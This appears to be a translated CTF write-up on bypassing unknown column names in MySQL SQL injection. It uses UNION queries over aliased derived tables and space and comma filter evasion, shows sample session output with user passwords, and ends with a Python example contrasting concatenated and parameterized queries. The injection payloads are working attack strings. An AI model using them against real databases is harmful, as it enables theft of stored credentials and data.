
Bypassing unknown field names in MySQL

2025-01-15 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article shows how unknown field names can be bypassed in MySQL. Most readers will not be very familiar with the technique, so it is shared here for reference.

Preface

This article introduces the technique for bypassing unknown field names from the fifth question of DDCTF. The steps are run on a local machine here, and the idea is neat and clear. The details follow:

Implementation idea

The challenge filters spaces and commas. The space filter can be bypassed by using %0a in place of spaces, or by using parentheses directly.

The name of the field in which the flag is stored is unknown, and the hex form of the table name is filtered as well, so information_schema.columns cannot be used to obtain the field name. In this case, you can use a UNION query as follows:

The idea is to retrieve the flag and make it appear under a known field name.

Sample code:

    mysql> select (select 1) a, (select 2) b, (select 3) c, (select 4) d;
    +---+---+---+---+
    | a | b | c | d |
    +---+---+---+---+
    | 1 | 2 | 3 | 4 |
    +---+---+---+---+
    1 row in set (0.00 sec)

    mysql> select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d;
    +---+---+---+---+
    | 1 | 2 | 3 | 4 |
    +---+---+---+---+
    | 1 | 2 | 3 | 4 |
    +---+---+---+---+
    1 row in set (0.00 sec)

    mysql> select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user;
    +---+-------+----------+-------------+
    | 1 | 2     | 3        | 4           |
    +---+-------+----------+-------------+
    | 1 | 2     | 3        | 4           |
    | 1 | admin | admin888 | 110@110.com |
    | 2 | test  | test123  | 119@119.com |
    | 3 | cs    | cs123    | 120@120.com |
    +---+-------+----------+-------------+
    4 rows in set (0.01 sec)

    mysql> select e.4 from (select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user) e;
    +-------------+
    | 4           |
    +-------------+
    | 4           |
    | 110@110.com |
    | 119@119.com |
    | 120@120.com |
    +-------------+
    4 rows in set (0.03 sec)

    mysql> select e.4 from (select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user) e limit 1 offset 3;
    +-------------+
    | 4           |
    +-------------+
    | 120@120.com |
    +-------------+
    1 row in set (0.01 sec)

    mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user) e limit 1 offset 3) f, (select 1) g, (select 1) h, (select 1) i;
    +-------------+----------+----------+-------------+
    | id          | username | password | email       |
    +-------------+----------+----------+-------------+
    | 1           | admin    | admin888 | 110@110.com |
    | 120@120.com | 1        | 1        | 1           |
    +-------------+----------+----------+-------------+
    2 rows in set (0.04 sec)

The above is the full method for bypassing unknown field names in MySQL.
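How the same request value behaves when it is concatenated into the statement versus bound as a parameter, as an added example that is not part of the original article. Assumptions: SQLite (through Python's sqlite3) stands in for MySQL, explicit AS aliases replace the (select N) derived tables, and the names make_db, lookup_concat and lookup_bound are hypothetical.

```python
import sqlite3

# Constructed sample data: the `user` rows shown in the page's MySQL session.
ROWS = [
    (1, "admin", "admin888", "110@110.com"),
    (2, "test", "test123", "119@119.com"),
    (3, "cs", "cs123", "120@120.com"),
]

# Constructed input modelled on the page's final query: the UNION's first
# SELECT supplies the names a..d, so the fourth column of `user` is read as
# e.d without its real name ever appearing in the input.
PAGE_STYLE_INPUT = (
    "1 UNION SELECT e.d, 1, 1, 1 FROM "
    "(SELECT 1 AS a, 2 AS b, 3 AS c, 4 AS d UNION SELECT * FROM user) e"
)


def make_db():
    """In-memory SQLite database standing in for the MySQL instance (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT, email TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?, ?, ?)", ROWS)
    return db


def lookup_concat(db, user_id):
    """Weak form: the request value is spliced into the SQL text."""
    return db.execute("SELECT * FROM user WHERE id=" + user_id).fetchall()


def lookup_bound(db, user_id):
    """Hardened form: the value is bound, so it is only ever compared as data."""
    return db.execute("SELECT * FROM user WHERE id=?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concat(db, PAGE_STYLE_INPUT))
    print("bound       :", lookup_bound(db, PAGE_STYLE_INPUT))
    print("bound, id=1 :", lookup_bound(db, "1"))
```

Filtering spaces, commas or information_schema does not change the outcome of the concatenated form; binding the value does, because the input never reaches the SQL parser.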
